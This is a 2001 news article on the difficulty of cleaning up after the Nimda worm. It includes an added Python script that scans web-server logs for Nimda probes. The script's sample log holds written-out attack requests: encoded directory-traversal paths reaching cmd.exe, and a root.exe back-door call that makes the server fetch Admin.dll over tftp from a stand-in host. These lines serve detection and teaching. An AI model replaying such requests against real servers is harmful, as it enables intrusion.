Nimda Needs Harsh Disinfectant

Worm exploits many system vulnerabilities

Cleaning up after last week's fast-spreading Nimda worm could prove to be harder and more time-consuming for users than it has been after other malicious software attacks.

Companies that aren't careful could be reinfected and leave back doors open for future exploitation, users and analysts said.

"Nothing is cleaning this virus. The tools out today simply delete or quarantine the infected files," said one frustrated e-mailer to Computerworld who requested anonymity.

"We have had 50,000 to 100,000 infected files in my data center alone, and we were patched all the way up [after the Code Red attack]," he wrote. "We are smart people. This one just won't be stopped."

The Nimda worm—reports of which first began flooding into mailing lists and security firms on Sept. 18—is a mass-mailed piece of malicious code that infects systems running Microsoft Corp.'s Windows 95, 98, ME, NT and 2000.

Why Nimda Is a Nuisance

It spreads via both network-based e-mail and Web browsers.

It modifies critical system files and registry keys.

It enables the built-in Guest account and adds it to the local Administrators group.

It increased average Web page download times to 3.07 seconds last Wednesday morning compared with 2.45 seconds the day before, according to a Keynote Systems study of 40 large businesses. Overall site availability fell from 92% to 90%.

Unlike other worms and viruses, Nimda is capable of spreading via both network-based e-mail and Web browsers. It was also written to scan for and exploit back doors left behind by previous viruses such as Code Red and Sadmind.

"The newness of this is that it leverages a number of different vulnerabilities in order to propagate itself," said Allen Householder, an analyst at the CERT Coordination Center at Carnegie Mellon University in Pittsburgh.

Nimda propagates via various means, including modifying Web content on vulnerable systems running Microsoft's Internet Information Server software, Householder said.

In the process, Nimda last week clogged part of the Internet, slowing down or even stopping Web traffic for some users. Many sites also experienced high volumes of e-mail and network traffic as a result of the worm, according to a joint statement from CERT, the SANS Institute in Bethesda, Md., and the Information Technology Association of America in Arlington, Va.

In a four-hour period starting at approximately 8 a.m. CDT Tuesday, the University of Chicago's Web servers were scanned by almost 7,000 unique IP addresses looking for vulnerabilities to exploit, said Larry Lidz, a senior network security officer at the school.

As a result of the attacks, about 20 university servers were infected with the Nimda worm and had to be disconnected from the network, Lidz said. He recommended to school officials that those systems be reformatted and all software reinstalled.

"If somebody has used a back door left by worms such as Code Red to infect your systems, you never really know what they have done to the system," Lidz said.
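The scanning Lidz describes shows up in a Web server's log as a burst of requests for root.exe, cmd.exe and admin.dll from many source addresses. The script below is an added example, not code from the article or from any of the people or organizations it quotes. It parses a few constructed Apache-style common-log lines (IIS's own W3C log layout differs, so the regex would need adapting for a real IIS log) and flags Nimda-style probes, counting unique sources and separating the 2xx responses, which mean the server actually executed the request and still has the back door Lidz warns about, from the 404s a patched host returns. The signature list is reconstructed from public analyses of the worm and is an assumption of the example; the article itself names only root.exe and admin.dll.

```python
import re
from collections import Counter

# Request-path signatures of the probes Nimda sends to IIS servers. The article
# names only root.exe and admin.dll; the traversal encodings are reconstructed
# from public analyses of the worm and are an assumption of this example.
SIGNATURES = [
    # Code Red II left root.exe (a copy of cmd.exe) in /scripts and /MSADC.
    ("root_exe_backdoor", re.compile(r"/root\.exe(\?|$)", re.I)),
    # Nimda's own copy of itself, dropped on servers it reaches.
    ("admin_dll_nimda_copy", re.compile(r"/admin\.dll(\?|$)", re.I)),
    # Directory traversal hidden behind double URL encoding (%255c decodes to "\").
    ("cmd_double_encoded", re.compile(r"%25(5c|2f).*?/cmd\.exe", re.I)),
    # Directory traversal hidden behind overlong UTF-8 (%c0%af, %c1%1c for "/", "\").
    ("cmd_overlong_utf8", re.compile(r"%c[01]%[0-9a-f]{2}.*?/cmd\.exe", re.I)),
    # cmd.exe reached without traversal, e.g. through a /c or /d virtual directory.
    ("cmd_exe_direct", re.compile(r"/cmd\.exe(\?|$)", re.I)),
]

# Apache-style common log format (assumed here; IIS W3C logs are laid out differently):
# client ident user [time] "METHOD path PROTO" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)


def classify(path):
    """Return the name of the first matching Nimda signature, or None."""
    for name, rx in SIGNATURES:
        if rx.search(path):
            return name
    return None


def analyze(lines):
    """Scan log lines for Nimda probes.

    Returns (hits, sources, by_signature, successes):
      hits          list of (ip, status, signature, path) for every probe seen
      sources       set of unique scanning IPs (the "unique addresses" figure)
      by_signature  Counter of probe types
      successes     probes answered with a 2xx status: the server executed the
                    request, so the back door is present and the host needs a rebuild
    """
    hits, sources, by_signature = [], set(), Counter()
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a request line in the expected layout; skip it
        sig = classify(m["path"])
        if sig is None:
            continue
        status = int(m["status"])
        hits.append((m["ip"], status, sig, m["path"]))
        sources.add(m["ip"])
        by_signature[sig] += 1
    successes = [h for h in hits if 200 <= h[1] < 300]
    return hits, sources, by_signature, successes


# Constructed sample log for one server, not real traffic. The scanner at
# 10.0.0.5 gets 404 for every probe because the traversal holes are patched;
# the scanner at 192.0.2.77 finds a root.exe back door that Code Red II left in
# /MSADC and uses it to make the server fetch Admin.dll over tftp; 198.51.100.9
# is ordinary browsing.
SAMPLE_LOG = """\
10.0.0.5 - - [18/Sep/2001:08:01:12 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 0
10.0.0.5 - - [18/Sep/2001:08:01:13 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0
10.0.0.5 - - [18/Sep/2001:08:01:14 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0
10.0.0.5 - - [18/Sep/2001:08:01:14 -0500] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0
192.0.2.77 - - [18/Sep/2001:08:03:40 -0500] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 200 1290
192.0.2.77 - - [18/Sep/2001:08:03:41 -0500] "GET /MSADC/root.exe?/c+tftp%20-i%20192.0.2.77%20GET%20Admin.dll HTTP/1.0" 200 312
198.51.100.9 - - [18/Sep/2001:08:05:02 -0500] "GET /index.html HTTP/1.1" 200 4471
198.51.100.9 - - [18/Sep/2001:08:05:03 -0500] "GET /images/logo.gif HTTP/1.1" 200 2100
"""


def report(lines):
    """Print a triage summary and return the probes that succeeded."""
    hits, sources, by_signature, successes = analyze(lines)
    print(f"{len(hits)} Nimda probes from {len(sources)} unique source addresses")
    for sig, n in by_signature.most_common():
        print(f"  {sig:24s} {n}")
    for ip, status, sig, path in successes:
        print(f"  BACKDOOR EXECUTED by {ip}: {status} {path}")
    return successes


if __name__ == "__main__":
    report(SAMPLE_LOG.splitlines())
```

A 404 against every probe is what a patched host produces; a 200 against root.exe means a command ran through a back door that patching never removed, which is the situation the anonymous data-center e-mailer describes and the reason the rebuild advice below is not overkill.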

Insidious Worm

Much of the standard antivirus software that was available at the time the worm struck failed to keep Nimda from spreading, users and analysts said.

The worm does a number of insidious things, such as modifying critical system files and registry keys, making every directory available as a file share and creating a guest account with administrator privileges, said Russ Cooper, an analyst at TruSecure Corp., a Reston, Va.-based security firm.

"These characteristics make it incredibly difficult to clean the worm from an infected system," according to a SANS advisory.

"Running [antivirus software] alone will not fix the problem," said Edward York, chief technical officer at 724 Inc., an application hosting service in Lompoc, Calif.

"The server must be secured all over again, all open shares closed, the Hot Fixes reapplied, the guest account disabled again and all traces of any file called root.exe or admin.dll deleted from the system," York said. Administrators also need to ensure that any registry items added by Nimda have been removed, he said.

Until more sophisticated fixes become available, the only sure course is to disconnect infected systems from the network, reformat their hard drives, reinstall software from a clean source and apply the appropriate security patches, according to recommendations issued by CERT and SANS.

Copyright © 2001 IDG Communications, Inc.
